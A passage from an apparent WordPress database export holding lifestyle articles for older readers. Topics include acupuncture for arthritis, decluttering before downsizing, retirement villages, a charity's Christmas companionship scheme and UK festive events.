src=\"http://westonspirit.org.uk/wp-content/uploads/2011/11/pians-and-needles--300x199.jpg\" alt=\"\" width=\"300\" height=\"199\" />Based on principles of Chinese medicine dating back almost 2,000 years, acupuncture aims to correct imbalances of energy flow in the body. It is thought to relieve pain by diverting or changing sensations sent to the brain and stimulating the release of natural pain-relieving chemicals such as endorphins.</p>&#13;\n<p>Typically, a course of six to eight weekly sessions lasting up to 30 minutes each is required for pain relief. Once relief is achieved it can last for several months.</p>&#13;\n<p>Acupuncture has its detractors and it is widely acknowledged that further research is needed into its efficacy as an arthritis treatment, but a growing collection of evidence-based clinical research is lending weight to practitioners’ claims.</p>&#13;\n<p>This has prompted rationing organisation the National Institute for Health and Clinical Excellence to give NHS patients with chronic lower back pain the right to free acupuncture. Acupuncture on the NHS is also becoming more available for patients with knee osteoarthritis through pain clinics, physiotherapy departments or GPs.</p>&#13;\n<p>The St Albans and Harpenden Acupuncture Knee Clinic, the only clinic of its kind in the UK, offers nurse-led sessions for patients with knee osteoarthritis as an alternative to knee replacement surgery. All are originally referred by their GP.</p>&#13;\n<p>Marion Richardson, an acupuncturist and lecturer who set up the service with GP Dr Jonathan Freedman, explains: “Of 165 patients seen over three years, about half have had their pain and disability levels reduced long term and haven’t sought referral for surgery.”</p>&#13;\n<p>The team says cost savings made through the project are currently being evaluated but are “considerable”.</p>&#13;\n<p>Vast numbers of sufferers will, however, still have to pay for acupuncture, according to Dr Mike Cummings, medical director of the British Medical Acupuncture Society, a nationwide group of doctors and health professionals who use the therapy alongside more conventional techniques.</p>&#13;\n<p>He says: “Services are patchy. In some areas access is easy while, in others, there’s no chance. Although people argue over aspects of acupuncture, research overall looks good and I think access would have expanded further in the past few years if not for difficulties around funding.”</p>&#13;\n<p>Because acupuncture focuses on the individual and not the illness, practitioners advocate it as especially beneficial to older people’s broader wellbeing.</p>&#13;\n<p>Acupuncturist Maureen Cromey, who practises in Chiswick and Harley Street, says: “Chinese medicine is gentle and reverent towards people who are ageing and is geared towards supporting and caring for them.”</p>&#13;\n<p>Charity Arthritis Research UK recently announced a trial at the University of York to investigate the effectiveness of acupuncture in easing chronic neck pain.</p>&#13;\n<p>A spokeswoman says: “Acupuncture is among therapies we’re looking at for our forthcoming authoritative report on complementary therapies for osteoarthritis, rheumatoid arthritis and back pain.”</p>&#13;\n									</div>','Pains and needles','683','publish','open','open','','pains-and-needles','','','2018-04-02 20:09:09','2018-04-02 20:09:09','',0,'http://westonspirit.org.uk/pains-and-needles.asp',0,'post','',0),(72,1,'2015-05-14 12:57:20','2015-05-14 12:57:20','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">21 November 2016</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Stash in the attic\" st_url=\"http://westonspirit.org.uk/2011/11/stash-in-the-attic/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Stash in the attic\" st_url=\"http://westonspirit.org.uk/2011/11/stash-in-the-attic/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Stash in the attic\" st_url=\"http://westonspirit.org.uk/2011/11/stash-in-the-attic/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Stash in the attic\" st_url=\"http://westonspirit.org.uk/2011/11/stash-in-the-attic/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Stash in the attic\" st_url=\"http://westonspirit.org.uk/2011/11/stash-in-the-attic/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Sorting through a lifetime of possessions and memories can be traumatic, but the right help can take the distress out of downsizing</h4>&#13;\n<p> Downsizing from a large three bedroom house to a retirement flat half the size threatened to be a highly distressing experience for George and Elizabeth Whittle.</p>&#13;\n<p>The 75-year-old former City banker and his wife, 68, had lived in the same house in Ealing, west London, for 42 years. Four decades’ worth of crockery, books, clothes and family mementoes were never going to be easy to give up, but the Whittles had help from Seamless Relocation, specialists in helping people to make what can be painful decisions ahead of a house move.</p>&#13;\n<p><img class=\"alignright size-full wp-image-1035\" title=\"stach in the attic 1\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/11/stach-in-the-attic-1-.jpg\" alt=\"\" width=\"300\" height=\"450\" />“We could not have done it without help,” George Whittle says. “We had been very worried about how we were going to declutter and move, and we didn’t want to have any regrets.</p>&#13;\n<p>“We have not missed any of the items we got rid of because we received a great deal of help in deciding what we wanted to keep. Without support it would have been a very stressful experience.</p>&#13;\n<p>Decluttering is a very difficult hurdle for older people yet having a good throw-out can be very liberating and energising, according to Charmian Boyd, joint owner of Seamless Relocation.</p>&#13;\n<p>Older people need a particular care and respect as their homes are repositories of precious memories, she says. “Often they are the guardians of family heirlooms, so a great deal of sensitivity is required. We would never go in and ask someone ‘Why on earth are you hanging on to this?’ but sometimes you have to ask subtle and probing questions to help people make a decision.”</p>&#13;\n<p>Besides downsizing, some people seek to move because they think they need more space. Lynn Pick, from Home Stylers, once saved an elderly couple from spending thousands of pounds on an extension by showing them how to use the existing space more efficiently.</p>&#13;\n<p><img class=\"alignleft size-medium wp-image-1036\" title=\"stash in the attic 2\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/11/stash-in-the-attic-2-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />“A good decluttering gives you freedom to move without feeling constricted,” she says. “I often notice the dark cloud lifting off people as we sort out their things and they suddenly become more relaxed and happy.”</p>&#13;\n<p>Jon Ramsay, owner of Clutterbee and spokesman for the Association of Professional Declutterers and Organisers, has seen some startling examples of clutter that has exploded into mayhem. At one house every inch of floor space was covered with papers, clothes and empty drinks cans. Other instances include rooms full of clothes and goods which still have shop labels attached to them.</p>&#13;\n<p>It is men who tend to fall at the extremes of clutter and tidiness, he says. “Men are territorial and will often surround themselves with things they think will come in useful. Gizmos and gadgets are often kept for their parts.</p>&#13;\n<p>“At the other extreme they can be incredibly tidy. I went into one home where the husband’s suits were all labelled in order of colour and designer, while the wife and kids lived in a complete mess.”</p>&#13;\n<p>Getting professionals in to help is more acceptable now, he thinks. “It’s a little like the culture of DIY where everyone used to have a go, but now people prefer to pay someone to do it for them.”</p>&#13;\n<div class=\"woo-sc-box normal   \">&#13;\n<h3><span class=\"Apple-style-span\" style=\"font-weight: bold;\">Move out, move on</span></h3>&#13;\n<p><strong>With an all-day eatery and jeweller, has one retirement community in America got the right idea?</strong></p>&#13;\n<p>House-swaps with people abroad are usually a route to a cheap holiday, but an exchange between two couples in the US and UK was undertaken with more than a change of scenery in mind.</p>&#13;\n<p>In an experiment by Audley Retirement in the UK and retirement specialists SRG in the US, Tony and Carol Gregory swapped their two-bedroomed cottage on Audley’s St Elphin’s Park Village development in Derbyshire for SRG’s Maravilla complex in Santa Barbara. Meanwhile, Lou and Muriel Schloss, who rent a two bedroom, two bathroom apartment at Maravilla, travelled in the opposite direction.</p>&#13;\n<p>St Elphin’s has 130 homes with facilities including a bistro and swimming pool, where people live independently but with care available. Maravilla has 350 residencies with a clubhouse, all-day restaurant, and services including cleaners, gardeners and even a jeweller.</p>&#13;\n<p>Both couples were impressed by the facilities they saw at the different sites and the Gregorys were particularly struck by Maravilla’s “memory care” facility, for people with dementia.</p>&#13;\n<p>They spotted some other practical ideas, Carol Gregory, 68, says: “The toilets were slightly higher which was a good idea for people when they are a bit older, and there are also little lights at the bottom of the skirting board in a couple of areas so you could see your way to the bathroom in the night.” One of the differences Lou Schloss, 86, and 84-year-old Muriel noted was the size of the kitchen.</p>&#13;\n<p>“The ones in the UK are bigger but they are set up to cook and we’re not,” says Lou. “We’ve lived in our community two and a half years, and we’ve never had a meal in our apartment.” And like the Gregorys, they stressed how living in a retirement community has enabled them to retain their independence and still feel secure.</p>&#13;\n<p>Lou says: “The retirement community lifestyle is much more relaxed and easy for us. Everything is taken care of and if something needs fixing it gets fixed by someone.”</p>&#13;\n<p>Audley undertook the experiment to see what could be learned from the US and its well-established retirement home market. In fact, says chief executive and chairman of the Association of Retirement Village Operators Nick Sanderson, the level of facilities is much the same, though the scale is larger there. But in the US, the attitude towards moving house and retirement living is markedly different.</p>&#13;\n<p>“The US are much more open to the idea of downsizing and changing one’s way of life later on,” he says. “They think it is much more logical than staying in a family home that’s now too big and could be full of potential health risks – worn carpets, things needing rewiring, stairs to negotiate. It’s a very British thing to stay put to maintain your independence and let the house fall down around you. Whereas if people take the decision early and move into the right accommodation for them, they can avoid a lot of the risks that they believe they are avoiding by staying in their own home.”</p>&#13;\n<p>Experiences of both couples can be viewed on the Audley blog and images are on the Facebook page.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em><strong><a title=\"www. audleyretirement.co.uk\" href=\"http://www. audleyretirement.co.uk/\" target=\"_blank\">www. audleyretirement.co.uk</a></strong></em></p>&#13;\n</div> &#13;\n									</div>','Stash in the attic','1071','publish','open','open','','stash-in-the-attic','','','2018-04-02 20:09:08','2018-04-02 20:09:08','',0,'http://westonspirit.org.uk/stash-in-the-attic.asp',0,'post','',0),(73,1,'2017-07-11 23:38:33','2017-07-11 23:38:33','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">21 November 2016</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Still living life to the full\" st_url=\"http://westonspirit.org.uk/2011/11/still-living-life-to-the-full/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Still living life to the full\" st_url=\"http://westonspirit.org.uk/2011/11/still-living-life-to-the-full/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Still living life to the full\" st_url=\"http://westonspirit.org.uk/2011/11/still-living-life-to-the-full/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Still living life to the full\" st_url=\"http://westonspirit.org.uk/2011/11/still-living-life-to-the-full/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Still living life to the full\" st_url=\"http://westonspirit.org.uk/2011/11/still-living-life-to-the-full/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Retaining independence and a sense of community is paramount at award-winning country retirement village</h4>&#13;\n<p>“If I have one complaint,” said a relative of one of the residents of St George’s Park retirement village, “it’s that I can never get hold of my mother. She’s always doing something!” I had done my homework, so I knew that St George’s Park was set in 250 acres of beautiful Sussex countryside and I anticipated that the standard of the purpose built apartments would be very high. What I had not considered was that the community would have formed its own active identity so quickly. And active is the key word here. As a resident, there’s plenty to do.</p>&#13;\n<p><img class=\"alignright size-medium wp-image-1030\" title=\"still living life to the full 1\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/11/still-living-life-to-the-full-1-300x199.jpg\" alt=\"\" width=\"300\" height=\"199\" />Maes Court, the community building at the heart of the village, offers a range of facilities including a mini-supermarket, an attractive bar/bistro and restaurant, a library, a games room, a hairdressing salon, a therapy suite, and a gym. Outside is a bowling green and croquet lawn. Many other functions are arranged by the residents themselves – from the film club to the summer boules competitions.</p>&#13;\n<p>As I was being shown around, I noticed a list of November activities pinned to the notice board. It included a firework display and dinner, a forthcoming concert, Mahjong, painting classes and much more. This may be a retirement village, but there doesn’t seem to be much retiring going on!</p>&#13;\n<p><img class=\"alignleft size-medium wp-image-1031\" title=\"still living life to the full 2\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/11/still-living-life-to-the-full-2-300x199.jpg\" alt=\"\" width=\"300\" height=\"199\" />When I asked Philip Smith, marketing director at St George’s, what he was most proud of among the many awards won by the development over the last few years, he surprised me by saying: “It’s the warm community spirit which has developed among the residents.”</p>&#13;\n<p>Of course, a sense of community is very important. Most retired people rightly prize their independence – and a great strength of the village is that – while no one is ever pestered to ‘join in’, nobody need be alone if they don’t care to be.</p>&#13;\n<p>Spacious, light and thoughtfully designed, each two-bedroom, two-bathroom apartment is a stylish example of how good modern design can be. The buildings, too, display the same attention to detail with covered entrances and carpeted halls.</p>&#13;\n<p><img class=\"alignright size-medium wp-image-1032\" title=\"still living life to the full 3\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/11/still-living-life-to-the-full-3--300x199.jpg\" alt=\"\" width=\"300\" height=\"199\" />There is a regular minibus service to the local towns and group outings to popular destinations such as the theatre or cinema. Safety is particularly important in a community such as this and nothing has been left to chance, with monitored 24-hour CCTV coverage of the whole area.</p>&#13;\n<p>When St George’s Park was voted the UK’s Best Retirement Development in the prestigious What House? property industry awards, one of the judges commented: “The bar for retirement villages has certainly been raised. Here, residents can enjoy their retirement in the manner that best suits them.” It seems to me that St George’s Park is not just a well thought-out retirement development, managed and maintained to the highest standards, but a vibrant social environment in which life can be lived to the full.</p>&#13;\n<div class=\"woo-sc-box normal   \">&#13;\n<p><em>Prices from £345,00</em></p>&#13;\n<p><em></em><em>Call <strong>01444 259732</strong></em></p>&#13;\n<p><em><strong><a title=\"www.stgeorgespark.co.uk\" href=\"http://www.stgeorgespark.co.uk/\" target=\"_blank\">www.stgeorgespark.co.uk</a></strong></em></p>&#13;\n</div>&#13;\n									</div>','Still living life to the full','493','publish','open','open','','still-living-life-to-the-full','','','2018-04-02 20:09:06','2018-04-02 20:09:06','',0,'http://westonspirit.org.uk/still-living-life-to-the-full.asp',0,'post','',0),(75,1,'2017-12-19 02:56:50','2017-12-19 02:56:50','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">22 November 2016</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"The gift of companionship\" st_url=\"http://westonspirit.org.uk/2011/11/the-gift-of-companionship/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"The gift of companionship\" st_url=\"http://westonspirit.org.uk/2011/11/the-gift-of-companionship/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"The gift of companionship\" st_url=\"http://westonspirit.org.uk/2011/11/the-gift-of-companionship/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"The gift of companionship\" st_url=\"http://westonspirit.org.uk/2011/11/the-gift-of-companionship/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"The gift of companionship\" st_url=\"http://westonspirit.org.uk/2011/11/the-gift-of-companionship/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Older people don’t have to be lonely this Christmas as Abbeyfield prepares to open its doors to those facing the festive season on their own</h4>&#13;\n<p>Christmas for most people is a time of cheer and being together with family and friends. Sadly, however, that’s not the case for everyone, and a growing number of older people will face spending the festive season alone.</p>&#13;\n<p>To help combat this increasing trend in festive isolation, charity Abbeyfield is launching a nationwide campaign, Companionship At Christmas – a home from- home alternative for older people wishing to spend the festive period with others.</p>&#13;\n<p><img class=\"alignleft size-full wp-image-1046\" title=\"the gift of companion ship 2\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/11/the-gift-of-companion-ship-2-.jpg\" alt=\"\" width=\"300\" height=\"451\" />Abbeyfield is inviting older people who are alone over Christmas, residents with elderly neighbours living alone and family members in need of respite support over the Christmas period to get in touch.</p>&#13;\n<p>Actor Geoffrey Palmer, who is a spokesman for Abbeyfield’s Christmas campaign, says: “It is so sad that 850,000 older people are chronically lonely and while this is a daily issue, being alone or lonely is particularly heart breaking around Christmas time.</p>&#13;\n<p>“If the offer of free lunches and overnight stays over this time at an Abbeyfield house brings a bit of festive cheer to just one older person faced with spending the Christmas holidays alone, it will be worthwhile.”</p>&#13;\n<p>The charity wants to hear from people who are over 55, are currently living independently in their own home and who will be alone over Christmas.</p>&#13;\n<p>Abbeyfield chief executive Paul Allen says: “Our mission is simple; to enhance the quality of life for older people.”</p>&#13;\n<p><img class=\"alignright size-medium wp-image-1045\" title=\"Senior Couple Enjoying Meal Together\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/11/the-gift-of-companion-ship-1-300x210.jpg\" alt=\"\" width=\"300\" height=\"210\" />It is a stark reality that in this day and age, charities such as Age UK have to highlight that many people, especially OAPs, will this winter have to choose between either heating their home or eating, and sadly this is even more poignant over the Christmas holidays.</p>&#13;\n<p>Abbeyfield’s Companionship At Christmas initiative echoes the key mission of Abbeyfield to alleviate loneliness and recognises that the mind, body and soul are all of equal importance.</p>&#13;\n<p>The campaign has already received the backing of a number of MPs, other charitable organisations and local authorities charged with taking care of the elderly around the country, who agree that the scheme provides an invaluable lifeline to older people.</p>&#13;\n<div class=\"woo-sc-box normal   \">&#13;\n<p><em>To find your nearest participating Abbeyfield please contact <strong>0845 052 3553</strong> quoting The Sunday Telegraph – or visit <strong><a title=\"www.abbeyfield.com\" href=\"http://www.abbeyfield.com/\" target=\"_blank\">www.abbeyfield.com</a></strong></em></p>&#13;\n</div>&#13;\n									</div>','The gift of companionship','386','publish','open','open','','the-gift-of-companionship','','','2018-04-02 20:09:05','2018-04-02 20:09:05','',0,'http://westonspirit.org.uk/the-gift-of-companionship.asp',0,'post','',0),(76,1,'2016-10-21 12:10:37','2016-10-21 12:10:37','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">22 November 2016</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"The price of peace of mind\" st_url=\"http://westonspirit.org.uk/2011/11/the-price-of-peace-of-mind/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"The price of peace of mind\" st_url=\"http://westonspirit.org.uk/2011/11/the-price-of-peace-of-mind/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"The price of peace of mind\" st_url=\"http://westonspirit.org.uk/2011/11/the-price-of-peace-of-mind/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"The price of peace of mind\" st_url=\"http://westonspirit.org.uk/2011/11/the-price-of-peace-of-mind/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"The price of peace of mind\" st_url=\"http://westonspirit.org.uk/2011/11/the-price-of-peace-of-mind/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Move to a retirement village and live inexpensively – and in a better environment</h4>&#13;\n<p>Worrying about money is the last thing you want to do when you retire, but with the cost of living rising and incomes often failing to keep pace, it’s not always easy to ensure you can enjoy the quality of life you want at a price you can afford.</p>&#13;\n<p>However, most buyers of homes in specially designed retirement villages, where maintenance costs are met with one annual service charge, can enjoy significant savings, as well as the peace and prosperity they dreamed of. Not only have they been released from the financial burden of running a home, they have added facilities for making their lives more comfortable.</p>&#13;\n<p><img class=\"alignright size-medium wp-image-1064\" title=\"Bramshott Place, Liphook\" src=\"/wp-content/uploads/2011/11/the-price-of-peace-of-mind--300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />This is welcome news for the over-60s – energy bills are expected to rise by an average of nearly £200 a year, the present economic turmoil has sliced through their pensions, and household budgets continue to be squeezed after repeated increases in inflation.</p>&#13;\n<p>How do the figures stack up? Council tax, energy bills, water rates and home insurance now cost more than ever. Then there’s general maintenance and those unexpected repair bills, expenses that often tip the balance for people weighing up the costs of staying in their family home.</p>&#13;\n<p>Also, as people get older, the rural idyll that was once so appealing starts to have disadvantages. Travel costs more, with recent steep price rises in fuel and car insurance hitting those on retirement income especially hard. There is also the increasing need to be near facilities and to be within walking distance of shops and GPs.</p><div class=\"woo-sc-quote\"><p>Most buyers of homes in specially designed retirement villages are enjoying significant savings, as well as the peace and prosperity they dreamed of</p></div>&#13;\n<p>Hence the appeal of the retirement village. Fellow residents at Bramshott Place Village in Liphook, Hampshire, say that our energy efficient new homes save money and further savings are made in a myriad of ways, including no joining fees for clubs and organisations.</p>&#13;\n<p>Access is available to a ready-made community of like-minded individuals and having all amenities on hand certainly negates the need to travel. Set within its own park and woodland, we all enjoy the delights of a garden without having to employ and pay individual gardeners, and weekly cleaning is included in our service charge, along with laundry and window cleaning.</p>&#13;\n<p>On-site amenities such as a swimming pool and gym replaces the need for expensive gym membership; a library, games and meetings rooms, bar and restaurant allow us to dip in and out of events ranging from coffee mornings and wine tastings to keep-fit and dance classes, photography, snooker and table tennis. Complimentary broadband internet in the library is another saving.</p>&#13;\n<p>Another benefit for residents facing more frequent surgery visits is that Bramshott Place Village has its own medical centre, with a nurse and GP on hand. A corner shop and restaurant cut the need for, or reduce the frequency of, shopping trips, or the expense of cooking for one.</p>&#13;\n<p>And as the weather deteriorates, it is a comfort to know that the paths and roads at the village will be kept clear of snow.</p>&#13;\n<p>There are also advantages that you can’t put a price on, such as avoiding loneliness, often cited as ‘the hidden killer’. There is no loneliness in a kinship of like-minded individuals, all looking out for each other, socialising and working together for their mutual support.</p>&#13;\n<div class=\"woo-sc-box normal   \">&#13;\n<p><em><strong>Bill Gair</strong> is chief executive of <strong>Urban Renaissance Villages</strong>, and is also a village resident.</em></p>&#13;\n<p><em>Call <strong>01428 722800</strong></em></p>&#13;\n<p><em><strong><a title=\"www.bramshottplace.co.uk\" href=\"http://www.bramshottplace.co.uk/\" target=\"_blank\">www.bramshottplace.co.uk</a></strong></em></p>&#13;\n</div>&#13;\n									</div>','The price of peace of mind','591','publish','open','open','','the-price-of-peace-of-mind','','','2018-04-02 20:09:03','2018-04-02 20:09:03','',0,'http://westonspirit.org.uk/the-price-of-peace-of-mind.asp',0,'post','',0),(77,1,'2016-12-09 20:58:49','2016-12-09 20:58:49','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">21 November 2016</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> jholt\" title=\"Posts by John Holt\" rel=\"author\"&gt;John Holt</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_buttons\" st_title=\"Your festive cheer starts here\" st_url=\"http://westonspirit.org.uk/2011/11/your-festive-cheer-starts-here/\" displaytext=\"share\"></span><span class=\"st_linkedin_buttons\" st_title=\"Your festive cheer starts here\" st_url=\"http://westonspirit.org.uk/2011/11/your-festive-cheer-starts-here/\" displaytext=\"share\"></span><span class=\"st_twitter_buttons\" st_title=\"Your festive cheer starts here\" st_url=\"http://westonspirit.org.uk/2011/11/your-festive-cheer-starts-here/\" displaytext=\"share\"></span><span class=\"st_facebook_buttons\" st_title=\"Your festive cheer starts here\" st_url=\"http://westonspirit.org.uk/2011/11/your-festive-cheer-starts-here/\" displaytext=\"share\"></span><span class=\"st_plusone_buttons\" st_title=\"Your festive cheer starts here\" st_url=\"http://westonspirit.org.uk/2011/11/your-festive-cheer-starts-here/\" displaytext=\"share\"></span>						</div>&#13;\n                	                	                	<h4>From food to falconry and bells to re-enacted battles, there’s a wide range of events on offer to excite and entertain across the country</h4>&#13;\n<p>Despite the very best efforts over the years of Oliver Cromwell and our more politically correct local councils, all things Christmas continue to dominate the end of- year calendar in communities up and down the country. Food-wise, a smorgasbord of events takes place in the UK designed to appeal to all palates – from turkey and- Trimmings traditionalists to haute cuisine existentialists.</p>&#13;\n<p><img class=\"alignright size-thumbnail wp-image-1024\" title=\"BBC Gardeners\' World Live 2010 Campaign - FOOD (26th November 20\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/11/your-festive-cheer-starts-here-5--150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" />The main course is provided by the BBC’s Good Food Show Winter (NEC Birmingham, November 23 to 27) which has a strong Masterchef flavour this year. Presenters John Torode and Gregg Wallace will be inviting members of the public to cook their own favourites in a special version of the show which will also see former rugby player Phil Vickery, this year’s Celebrity Masterchef champion, take on last year’s winner Lisa Faulkner.</p>&#13;\n<p><img class=\"alignleft size-medium wp-image-1021\" title=\"your festive cheer starts here 2\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/11/your-festive-cheer-starts-here-2-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />If the countryside is more your thing, visit Rufford Abbey Country Park in Nottinghamshire, where the must-see event is the Aurora Christmas Illuminations (December 2-4, 9-11) which transform the trees into spooky sculptures and the park into a colourful winter wonderland.</p>&#13;\n<p>Talking of pleasing aesthetics, the sixth Folkestone Rendezvous Art Mart takes place in the Kent town on December 16 and 17. It provides an opportunity to browse and buy fine art and crafts items with more than two dozen specialists on hand to advise on that perfect present purchase.</p>&#13;\n<p><img class=\"alignright size-medium wp-image-1025\" title=\"your festive cheer starts here 6\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/11/your-festive-cheer-starts-here-6--300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />Meanwhile, outdoor types who prefer to see their animals in the flesh as opposed to on the plate should head for the Royal Welsh Winter Fair Llanelwedd, Builth Wells, on November 28 and 29. There are 300 trade stands, as well as handicraft displays, a floral art show and antiques, while judging of cattle, horses, sheep, pigs and poultry takes place in the International Pavilion.</p>&#13;\n<p>For days out with a difference, sample some of the traditions and historical events celebrated over the Christmas and New Year period.</p>&#13;\n<p>There’s a chance to enjoy the winter sport of medieval millionaires when the roles of royal falconers and hawkers are recreated at Kenilworth Castle, Warwickshire, on November 26 and 27. Visitors can find out how hawks were trained to catch specific birds and animals for the Christmas table.</p>&#13;\n<p><img class=\"alignleft size-medium wp-image-1022\" title=\"your festive cheer starts here 3\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/11/your-festive-cheer-starts-here-3-300x199.jpg\" alt=\"\" width=\"300\" height=\"199\" />Campanologists should head for Dewsbury Minster in West Yorkshire on Christmas Eve for Tolling the Devil’s Knell, a centuries old Tradition based on the tale of a medieval knight who, after committing a foul deed, donated a bell to be rung at his local church. Each Christmas it strikes the number of years since Christ’s birth.</p>&#13;\n<p>The fishing village of Stonehaven in Grampian provides some very different thrills and spills on New Year’s Eve. As the clocks strike midnight, the High Street is lit up by 60 local fireball swingers Marching down to the harbour where the balls are thrown into the sea.</p>&#13;\n<p>On the historical front, away-day revolutionaries have two important dates for their diaries. At Swarkestone Bridge in Derbyshire and in Derby city centre on December 3 and 4, there are re-enactments of the events leading to the about-turn of Bonnie Prince Charlie and his Jacobite forces as their quest for the English throne ended in the East Midlands in 1745.</p>&#13;\n<p>A hundred years earlier, another royal’s luck ran out when Charles I was executed in London. On January 29 2017, the King’s Army (the Royalist half of the English Civil War Society) retraces the route taken by the king from St James’s Palace to the Banqueting House where he lost his head in 1649.</p>&#13;\n<p><img class=\"alignright size-medium wp-image-1023\" title=\"your festive cheer starts here 4\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/11/your-festive-cheer-starts-here-4--300x199.jpg\" alt=\"\" width=\"300\" height=\"199\" />The spirit of Christmas past is celebrated in a series of themed events around the country. The town and pit village at Beamish social history museum in County Durham go back to the Edwardian period for special nights of street entertainment, traditional food, gifts and carols on December 9 and 16.</p>&#13;\n<p>Meanwhile, Caerphilly Castle goes the whole hog with its Medieval Christmas Fayre (December 10 and 11) with seasonal music of the period, a court jester, food, replica medieval goods and traditional crafts.</p>&#13;\n<p>If men and women in uniform – rather than peasants’ garb and armour – is more your thing, head for the British Military Tournament at Earls Court, December 2 to 4. The update of the old Royal Tournament is now a theatrical tour de force and this year is being presented by ABF The Soldiers’ Charity in association with the Royal Navy and Royal Marines Charity and the Royal Air Force Benevolent Fund. The 2016 show tells the story of “the special relationship” between the UK and US, recreating dramatic episodes in history, from the American War of Independence to operations in Afghanistan.</p>&#13;\n<p><img class=\"alignleft size-medium wp-image-1027\" title=\"your festive cheer starts here 8\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/11/your-festive-cheer-starts-here-8-300x241.jpg\" alt=\"\" width=\"300\" height=\"241\" />If you’re after something a little quieter but equally as invigorating on Christmas morning, go for a refreshing dip in icy waters. Or, at least, laugh and point at other people turning an unseasonal shade of blue.</p>&#13;\n<p>As well as the famous seasonal swim in the Serpentine in London’s Hyde Park, hardy revellers – some in fancy dress, some in less – will be taking the plunge at Hunstanton in Norfolk at 11am), Lowestoft in Suffolk (at 10.30am from the Hatfield Hotel), Porthcawl beach (at 11.45am) and Weymouth.</p>&#13;\n									</div>','Your festive cheer starts here','849','publish','open','open','','your-festive-cheer-starts-here','','','2018-04-02 20:09:02','2018-04-02 20:09:02','',0,'http://westonspirit.org.uk/your-festive-cheer-starts-here.asp',0,'post','',0),(78,1,'2016-05-20 21:55:19','2016-05-20 21:55:19','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">4 December 2016</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"A splash of magic\" st_url=\"http://westonspirit.org.uk/2011/12/a-splash-of-magic/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"A splash of magic\" st_url=\"http://westonspirit.org.uk/2011/12/a-splash-of-magic/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"A splash of magic\" st_url=\"http://westonspirit.org.uk/2011/12/a-splash-of-magic/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"A splash of magic\" st_url=\"http://westonspirit.org.uk/2011/12/a-splash-of-magic/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" 